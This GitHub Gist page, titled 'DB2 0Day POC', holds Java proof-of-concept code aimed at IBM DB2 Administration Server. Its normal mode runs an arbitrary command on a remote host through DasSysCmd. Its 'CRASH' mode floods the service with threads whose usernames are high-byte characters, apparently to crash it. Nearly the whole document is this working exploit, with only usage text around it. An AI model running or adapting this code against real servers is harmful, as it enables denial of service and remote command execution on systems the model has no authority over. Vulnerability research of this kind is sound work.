Created
August 31, 2012 10:07
-
-
Save axt/3551083 to your computer and use it in GitHub Desktop.
DB2 0Day POC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package org.axt.db2das; | |
| import com.ibm.db2.das.core.DasException; | |
| import com.ibm.db2.das.core.DasService; | |
| import com.ibm.db2.das.core.DasServiceListener; | |
| import com.ibm.db2.das.core.Sqlca; | |
| class TestRunSysCmd implements DasServiceListener, Runnable { | |
| private final String host; | |
| private final byte desttype; | |
| private final String user; | |
| private final String passwd; | |
| private final String command; | |
| TestRunSysCmd(String host, byte desttype, String user, String passwd, String command) { | |
| this.host = host; | |
| this.desttype = desttype; | |
| this.user = user; | |
| this.passwd = passwd; | |
| this.command = command; | |
| } | |
| public void processReply(DasService dasservice) { | |
| if (dasservice instanceof DasSysCmd) | |
| try { | |
| DasSysCmd dassyscmd = (DasSysCmd) dasservice; | |
| Sqlca sqlca = dassyscmd.getDasSqlca(); | |
| System.out.println((new StringBuilder()) | |
| .append("Return Code = ").append(sqlca.getSqlCode()) | |
| .toString()); | |
| if (sqlca.getSqlCode() == 0) { | |
| System.out.println("Cmd Return Code = " | |
| + dassyscmd.getCommandReturnCode()); | |
| System.out.println("Success Set Return Code = " | |
| + dassyscmd.getSuccessSetRc()); | |
| System.out.println("Output = "); | |
| System.out.println(dassyscmd.getOutputData()); | |
| } | |
| } catch (DasException dasexception) { | |
| System.out.println("Exception: Sqlcode = " | |
| + dasexception.getSqlca().getSqlCode()); | |
| } | |
| } | |
| public void run() { | |
| try { | |
| DasSysCmd dassyscmd = new DasSysCmd(host, desttype, user, passwd); | |
| dassyscmd.setDomain(null); | |
| dassyscmd.setInstanceName(null); | |
| dassyscmd.setDB2Release(-1); | |
| dassyscmd.setNewScript(command, null, null); | |
| dassyscmd.setWorkingDirectory("."); | |
| dassyscmd.setOutputRequired(true); | |
| dassyscmd.addListener(this); | |
| Thread thread = new Thread(dassyscmd); | |
| thread.start(); | |
| thread.join(); | |
| } catch (Exception exception) { | |
| System.out.println((new StringBuilder()).append("Error ") | |
| .append(exception).toString()); | |
| } | |
| } | |
| } | |
| public class Crash { | |
| public static void main(String[] args) { | |
| boolean printUsage = false; | |
| if(args.length == 4) { | |
| TestRunSysCmd trsc = new TestRunSysCmd(args[0], (byte) 0, args[1], args[2], args[3]); | |
| trsc.run(); | |
| } else if(args.length == 2 && args[1].equals("CRASH")){ | |
| for(int i=128;i<255;i++) { | |
| TestRunSysCmd trsc = new TestRunSysCmd(args[0], (byte) 0, String.format("%c",i), "---", "whoami"); | |
| new Thread(trsc).start(); | |
| } | |
| } else { | |
| printUsage = true; | |
| } | |
| if(printUsage) { | |
| System.err.println("Usage:"); | |
| System.err.println("\t-normal mode: \t<program> <hostname> <username> <password> <command-to-run>"); | |
| System.err.println("\t-crash mode: \t<program> <hostname> CRASH"); | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment